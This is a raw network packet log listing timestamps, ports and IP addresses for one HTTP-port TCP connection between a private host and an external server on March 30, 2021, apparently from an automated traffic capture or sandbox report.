Mar 30, 2021 14:22:53.283339977 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.283358097 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.283376932 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.283394098 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.283411980 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.283428907 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.283442020 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.283453941 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.283467054 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.283472061 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.283480883 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.283504009 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.283523083 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.283540010 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.283556938 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.283560038 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.283576012 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.283592939 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.283611059 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.283627987 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.283638954 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.283651114 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.283669949 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.283687115 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.283699036 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.283704996 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.283721924 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.283737898 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.283757925 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.283761024 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.283776045 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.283798933 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.283818960 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.283818960 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.283837080 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.283854008 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.283870935 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.283870935 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.283891916 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.283910990 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.283921957 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.283927917 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.283951044 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.283970118 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.283987045 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.284003973 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.284020901 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.284038067 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.284059048 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.284060001 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.284077883 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.284101963 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.284121037 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.284137964 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.284156084 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.284173965 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.284177065 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.284192085 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.284209967 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.284225941 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.284240007 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.284248114 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.284266949 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.284284115 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.284301043 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.284326077 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.284393072 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.284847975 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.284938097 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.288387060 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.289892912 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.296911001 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.296946049 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.296962976 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.296981096 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.296997070 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.297013998 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.297034025 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.297051907 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.297060013 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.297069073 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.297082901 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.297087908 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.297096014 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.297106981 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.297125101 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.297141075 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.297158957 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.297158957 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.297182083 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.297199011 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.297204018 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.297221899 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.297226906 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.297247887 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.297251940 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.297271013 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.297286987 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.297301054 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.297306061 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.297322989 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.297338963 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.297343016 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.297362089 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.297368050 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.297379971 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.297405958 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.297435999 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.297452927 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.297470093 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.297481060 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.297491074 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.297519922 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.297524929 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.297537088 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.297559023 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.297569036 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.297580004 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.297599077 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.297605991 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.297616005 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.297632933 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.297642946 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.297648907 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.297666073 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.297672987 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.297683001 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.297704935 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.297708988 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.297722101 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.297739029 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.297755957 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.297758102 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.297774076 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.297779083 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.297792912 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.297811031 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.297818899 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.297827959 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.297848940 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.297868013 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.297871113 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.297884941 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.297899961 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.297904015 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.297920942 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.297933102 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.297938108 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.297956944 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.297970057 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.297975063 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.297996044 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.297997952 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.298015118 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.298032999 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.298046112 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.298049927 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.298069000 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.298082113 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.298086882 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.298105001 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.298120975 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.298141956 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.298160076 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.298167944 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.298175097 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.298177958 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.298197031 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.298213959 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.298218012 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.298232079 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.298238993 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.298252106 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.298264980 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.298269033 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.298290968 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.298300028 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.298310995 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.298327923 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.298345089 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.298348904 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.298362017 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.298377991 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.298388958 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.298394918 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.298410892 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.298413038 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.298434019 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.298439980 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.298454046 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.298469067 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.298485994 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.298490047 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.298502922 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.298520088 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.298530102 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.298537016 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.298547029 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.298556089 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.298576117 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.298593998 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.298595905 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.298610926 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.298626900 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.298629999 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.298650980 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.298660040 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.298666954 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.298685074 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.298697948 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.298703909 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.298726082 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.298728943 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.298744917 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.298762083 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.298778057 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.298788071 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.298794985 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.298811913 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.298815966 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.298827887 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.298844099 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.298860073 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.298866034 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.298883915 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.298883915 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.298901081 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.298907995 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.298919916 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.298938036 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.298942089 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.298954964 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.298971891 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.298980951 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.298990011 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.299010038 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.299027920 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.299035072 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.299046993 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.299063921 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.299072027 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.299083948 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.299088955 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.299102068 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.299119949 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.299127102 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.299138069 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.299158096 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.299166918 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.299177885 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.299195051 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.299211025 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.299215078 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.299243927 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.299557924 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.373368979 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.373440027 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.373459101 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.373472929 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.373486996 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.373505116 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.373522997 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.373539925 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.373557091 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.373574972 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.373588085 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.373600960 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.373617887 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.373640060 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.373658895 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.373676062 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.373694897 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.373713970 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.373730898 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.373744011 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.373760939 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.373776913 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.373794079 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.373810053 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.373811960 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.373826981 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.373845100 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.373866081 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.373883963 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.373902082 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.373919010 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.373938084 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.373954058 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.373970985 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.373987913 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.373991966 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.374008894 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.374001980 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.374026060 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.374027967 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.374047041 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.374052048 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.374066114 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.374083042 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.374100924 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.374109983 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.374119997 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.374136925 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.374154091 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.374157906 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.374176979 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.374186993 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.374195099 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.374212980 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.374229908 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.374229908 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.374245882 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.374264002 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.374279976 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.374288082 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.374300957 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.374320030 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.374335051 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.374336004 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.374355078 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.374371052 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.374387980 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.374392033 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.374404907 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.374422073 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.374433994 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.374442101 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.374463081 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.374464989 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.374479055 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.374495983 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.374496937 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.374512911 CEST	80	49744	45.139.236.6	192.168.2.4
